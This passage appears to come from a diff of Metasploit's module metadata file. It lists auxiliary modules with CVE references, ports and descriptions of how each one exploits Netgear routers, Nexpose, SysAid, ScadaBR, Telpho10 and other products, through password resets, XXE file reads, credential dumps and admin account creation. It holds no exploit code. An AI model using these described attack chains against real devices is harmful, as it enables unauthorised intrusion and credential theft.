telnet on the target router and then utiltizes\n the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the\n admin user. 
This will result in the attacker obtaining a new telnet session as the \"root\" user.\n\n This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.", - "references": [ - "URL-https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133", - "URL-https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "RelatedModules": [ - "exploit/linux/telnet/netgear_telnetenable" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_r6700_pass_reset": { - "name": "Netgear R6700v3 Unauthenticated LAN Admin Password Reset", - "fullname": "auxiliary/admin/http/netgear_r6700_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-15", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro ", - "Radek Domanski ", - "gwillcox-r7" - ], - "description": "This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),\n on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset\n the password for the 'admin' user back to its factory default of 'password'. 
Authentication is bypassed by\n using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent\n computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only\n supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58\n firmware, however support for other firmware versions may be added in the future.\n\n Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a\n special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can\n then log into this telnet server using the new password, and obtain a shell as the \"root\" user.\n\n These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.\n It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.\n As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit\n this vulnerability once per reboot of the router.\n\n This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n Radek Domanski).", - "references": [ - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md", - "URL-https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders", - "CVE-2020-10923", - "CVE-2020-10924", - "ZDI-20-703", - "ZDI-20-704" - ], - "platform": "", - "arch": "", - "rport": 5000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb", - "is_install_path": true, 
- "ref_name": "admin/http/netgear_r6700_pass_reset", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "config-changes" - ], - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "RelatedModules": [ - "exploit/linux/telnet/netgear_telnetenable" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_r7000_backup_cgi_heap_overflow_rce": { - "name": "Netgear R7000 backup.cgi Heap Overflow RCE", - "fullname": "auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-04-21", - "type": "auxiliary", - "author": [ - "colorlight2019", - "SSD Disclosure", - "Grant Willcox (tekwizz123)" - ], - "description": "This module exploits a heap buffer overflow in the genie.cgi?backup.cgi\n page of Netgear R7000 routers running firmware version 1.0.11.116.\n Successful exploitation results in unauthenticated attackers gaining\n code execution as the root user.\n\n The exploit utilizes these privileges to enable the telnet server\n which allows attackers to connect to the target and execute commands\n as the admin user from within a BusyBox shell. 
Users can connect to\n this telnet server by running the command \"telnet *target IP*\".", - "references": [ - "URL-https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/", - "CVE-2021-31802" - ], - "platform": "Linux", - "arch": "armle", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_soap_password_extractor": { - "name": "Netgear Unauthenticated SOAP Password Extractor", - "fullname": "auxiliary/admin/http/netgear_soap_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-02-11", - "type": "auxiliary", - "author": [ - "Peter Adkins ", - "Michael Messner ", - "h00die " - ], - "description": "This module exploits an authentication bypass vulnerability in different Netgear devices.\n It allows to extract the password for the remote management interface. 
This module has been\n tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:\n NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,\n NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),\n NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),\n NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),\n NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),\n NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),\n NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),\n NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),\n NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)", - "references": [ - "BID-72640", - "OSVDB-118316", - "URL-https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_soap_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_wnr2000_pass_recovery": { - "name": "NETGEAR WNR2000v5 Administrator Password Recovery", - "fullname": "auxiliary/admin/http/netgear_wnr2000_pass_recovery", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-12-20", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n 
This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.", - "references": [ - "CVE-2016-10175", - "CVE-2016-10176", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt", - "URL-https://seclists.org/fulldisclosure/2016/Dec/72", - "URL-https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_wnr2000_pass_recovery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/nexpose_xxe_file_read": { - "name": "Nexpose XXE Arbitrary File Read", - "fullname": "auxiliary/admin/http/nexpose_xxe_file_read", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Brandon Perry ", - "Drazen Popovic ", - "Bojan Zdrnja " - ], - "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. 
This module exploits the\n vulnerability via the XML API.", - "references": [ - "URL-http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/" - ], - "platform": "", - "arch": "", - "rport": 3780, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb", - "is_install_path": true, - "ref_name": "admin/http/nexpose_xxe_file_read", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/novell_file_reporter_filedelete": { - "name": "Novell File Reporter Agent Arbitrary File Delete", - "fullname": "auxiliary/admin/http/novell_file_reporter_filedelete", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. 
This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.", - "references": [ - "CVE-2011-2750", - "OSVDB-73729", - "URL-http://aluigi.org/adv/nfr_2-adv.txt" - ], - "platform": "", - "arch": "", - "rport": 3037, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb", - "is_install_path": true, - "ref_name": "admin/http/novell_file_reporter_filedelete", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/nuuo_nvrmini_reset": { - "name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset", - "fullname": "auxiliary/admin/http/nuuo_nvrmini_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-08-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.", - "references": [ - "CVE-2016-5676", - "US-CERT-VU-856152", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-nvr-vulns.txt", - "URL-https://seclists.org/bugtraq/2016/Aug/45" - ], - "platform": "", - 
"arch": "", - "rport": 8081, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/nuuo_nvrmini_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/openbravo_xxe": { - "name": "Openbravo ERP XXE Arbitrary File Read", - "fullname": "auxiliary/admin/http/openbravo_xxe", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-30", - "type": "auxiliary", - "author": [ - "Brandon Perry " - ], - "description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.", - "references": [ - "CVE-2013-3617", - "OSVDB-99141", - "BID-63431", - "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb", - "is_install_path": true, - "ref_name": "admin/http/openbravo_xxe", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/pfadmin_set_protected_alias": { - "name": "Postfixadmin Protected Alias Deletion Vulnerability", - "fullname": "auxiliary/admin/http/pfadmin_set_protected_alias", - 
"aliases": [], - "rank": 300, - "disclosure_date": "2017-02-03", - "type": "auxiliary", - "author": [ - "Jan-Frederik Rieckers" - ], - "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias", - "references": [ - "CVE-2017-5930", - "URL-https://github.com/postfixadmin/postfixadmin/pull/23", - "BID-96142" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb", - "is_install_path": true, - "ref_name": "admin/http/pfadmin_set_protected_alias", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/pihole_domains_api_exec": { - "name": "Pi-Hole Top Domains API Authenticated Exec", - "fullname": "auxiliary/admin/http/pihole_domains_api_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-08-04", - "type": "auxiliary", - "author": [ - "h00die", - "SchneiderSec" - ], - "description": "This exploits a command execution in Pi-Hole Web Interface <= 5.5.\n The Settings > API/Web inetrace page contains the field\n Top Domains/Top Advertisers which is validated by a regex which does not properly\n filter system commands, which can then be executed by calling the gravity\n functionality. 
However, the regex only allows a-z, 0-9, _.", - "references": [ - "URL-https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-5cm9-6p3m-v259", - "CVE-2021-32706" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-03 19:50:04 +0000", - "path": "/modules/auxiliary/admin/http/pihole_domains_api_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/pihole_domains_api_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/rails_devise_pass_reset": { - "name": "Ruby on Rails Devise Authentication Password Reset", - "fullname": "auxiliary/admin/http/rails_devise_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-28", - "type": "auxiliary", - "author": [ - "joernchen", - "jjarmoc" - ], - "description": "The Devise authentication gem for Ruby on Rails is vulnerable\n to a password reset exploit leveraging type confusion. By submitting XML\n to rails, we can influence the type used for the reset_password_token\n parameter. This allows for resetting passwords of arbitrary accounts,\n knowing only the associated email address.\n\n This module defaults to the most common devise URIs and response values,\n but these may require adjustment for implementations which customize them.\n\n Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database\n except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails\n 3.2.11. 
Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation\n of this vulnerability, by quoting numeric values when comparing them with\n non numeric values.", - "references": [ - "CVE-2013-0233", - "OSVDB-89642", - "BID-57577", - "URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/", - "URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html", - "URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8", - "URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/rails_devise_pass_reset", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/scadabr_credential_dump": { - "name": "ScadaBR Credentials Dumper", - "fullname": "auxiliary/admin/http/scadabr_credential_dump", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-05-28", - "type": "auxiliary", - "author": [ - "bcoles " - ], - "description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the `EmportDwr.createExportData` DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.", - "references": [], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 
443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-02-22 15:51:02 +0000", - "path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb", - "is_install_path": true, - "ref_name": "admin/http/scadabr_credential_dump", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/scrutinizer_add_user": { - "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass", - "fullname": "auxiliary/admin/http/scrutinizer_add_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-27", - "type": "auxiliary", - "author": [ - "MC ", - "Jonathan Claudius", - "Tanya Secker", - "sinn3r " - ], - "description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.", - "references": [ - "CVE-2012-2626", - "OSVDB-84318", - "URL-http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb", - "is_install_path": true, - "ref_name": "admin/http/scrutinizer_add_user", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sophos_wpa_traversal": { - "name": "Sophos Web Protection Appliance patience.cgi Directory Traversal", - "fullname": "auxiliary/admin/http/sophos_wpa_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": 
"2013-04-03", - "type": "auxiliary", - "author": [ - "Wolfgang Ettlingers", - "juan vazquez " - ], - "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.", - "references": [ - "CVE-2013-2641", - "OSVDB-91953", - "BID-58833", - "EDB-24932", - "URL-https://web.archive.org/web/20130603041204/http://www.sophos.com/en-us/support/knowledgebase/118969.aspx", - "URL-https://web.archive.org/web/20140701204340/https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb", - "is_install_path": true, - "ref_name": "admin/http/sophos_wpa_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/supra_smart_cloud_tv_rfi": { - "name": "Supra Smart Cloud TV Remote File Inclusion", - "fullname": "auxiliary/admin/http/supra_smart_cloud_tv_rfi", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-06-03", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra", - "wvu " - ], - "description": "This module exploits an unauthenticated remote file inclusion which\n exists in Supra Smart Cloud TV. The media control for the device doesn't\n have any session management or authentication. 
Leveraging this, an\n attacker on the local network can send a crafted request to broadcast a\n fake video.", - "references": [ - "CVE-2019-12477", - "URL-https://www.inputzero.io/2019/06/hacking-smart-tv.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb", - "is_install_path": true, - "ref_name": "admin/http/supra_smart_cloud_tv_rfi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sysaid_admin_acct": { - "name": "SysAid Help Desk Administrator Account Creation", - "fullname": "auxiliary/admin/http/sysaid_admin_acct", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-06-03", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. 
This module has been tested on SysAid 14.4 in Windows and Linux.", - "references": [ - "CVE-2015-2993", - "URL-https://seclists.org/fulldisclosure/2015/Jun/8", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb", - "is_install_path": true, - "ref_name": "admin/http/sysaid_admin_acct", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sysaid_file_download": { - "name": "SysAid Help Desk Arbitrary File Download", - "fullname": "auxiliary/admin/http/sysaid_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-06-03", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. 
Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.", - "references": [ - "CVE-2015-2996", - "CVE-2015-2997", - "URL-https://seclists.org/fulldisclosure/2015/Jun/8", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/sysaid_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sysaid_sql_creds": { - "name": "SysAid Help Desk Database Credentials Disclosure", - "fullname": "auxiliary/admin/http/sysaid_sql_creds", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-06-03", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. 
This module has been tested with SysAid 14.4 on Windows and Linux.", - "references": [ - "CVE-2015-2996", - "CVE-2015-2998", - "URL-https://seclists.org/fulldisclosure/2015/Jun/8", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb", - "is_install_path": true, - "ref_name": "admin/http/sysaid_sql_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/telpho10_credential_dump": { - "name": "Telpho10 Backup Credentials Dumper", - "fullname": "auxiliary/admin/http/telpho10_credential_dump", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-09-02", - "type": "auxiliary", - "author": [ - "Jan Rude" - ], - "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. 
This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb", - "is_install_path": true, - "ref_name": "admin/http/telpho10_credential_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/tomcat_administration": { - "name": "Tomcat Administration Tool Default Access", - "fullname": "auxiliary/admin/http/tomcat_administration", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "Detect the Tomcat administration interface. 
